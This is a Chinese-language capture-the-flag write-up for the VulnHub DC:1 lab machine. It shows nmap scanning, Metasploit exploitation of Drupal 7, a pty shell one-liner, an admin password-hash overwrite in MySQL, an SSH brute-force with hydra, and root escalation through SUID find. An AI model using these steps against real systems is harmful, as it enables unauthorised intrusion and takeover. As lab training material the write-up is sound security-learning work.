vulnhub DC:1渗透笔记

DC:1渗透笔记

靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/

kali ip地址

信息收集

首先扫描一下靶机ip地址

nmap -sP 192.168.20.0/24

扫描开放端口

nmap -A 192.168.20.128

开放22 80 111端口，111端口为rpcbind漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上任意大小的内存(每次攻击最高可达4GB),除非进程崩溃，或者管理员挂起/重启rpcbind服务，否则该内存不会被释放)

我们先访问一下80端口

利用火狐Wappalyzer插件发现管理系统为Drupal7.x,百度发现其漏洞，那就简单了，我们利用msf进行攻击即可

漏洞利用

msf启动后搜索drupal,发现可用脚本

设置RHOSTS和payload

成功控制到主机

使用python构建交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入ls查看发现flag1.txt我们来看一下

提示要去看配置文件，我们find搜索看看

发现一个类似配置文件的文件去看看，结果发现了flag2

解释下来的意思是

蛮力和字典攻击不是
获得访问权限的唯一方法（您将需要访问权限）。
你可以用这些凭据做什么？

除此之外还发现了数据库用户密码配置

查看一下3306端口有没有开放

发现开放我们直接连接数据库

查看一下有哪些库

show databases;

查看drupaldb中的表

use drupaldb;
show tables;

发现users表

查看users中所有数据

select * from users;

发现密码经过加密退出数据库在搜索看看有没有什么利用文件

find / -name "pass*"

发现这个可疑文件，我们尝试运行一下看看

好像是生成密码的脚本，我们输入个123456看看

有点像数据库里面那种密码类型我们登入数据库进行密码修改

update users set pass="$S$D2.3Z.T3oIkAGiTdoSMUiF2A2HO0Rphj/ucfjuUqXgM7ATCmW4C7" where uid=1;

成功修改前往登录后台，并且发现flag3

翻译下来的意思为

特殊的PERMS 将帮助查找passwd——但是您需要-exec 该命令来确定如何获取shadow中的内容。

查看/etc/passwd文件

 

发现flag4,且开放了22端口hydra爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.20.128 ssh

得到用户名密码ssh登录

登录上去发现第四个flag

大致意思就是使用find提权了

提权

find / -perm -u=s -type f 2>/dev/null

-perm：按照权限查找
-type：查是块设备b、目录d、字符设备c、管道p、符号链接l、普通文件f
-u=s：拥有者是s权限
S权限：设置使文件在执行阶段具有文件所有者的权限，相当于临时拥有文件所有者的身份. 典型的文件是passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码。

find可以使用suid提权

 

成功上升到root权限

发现最后flag

完成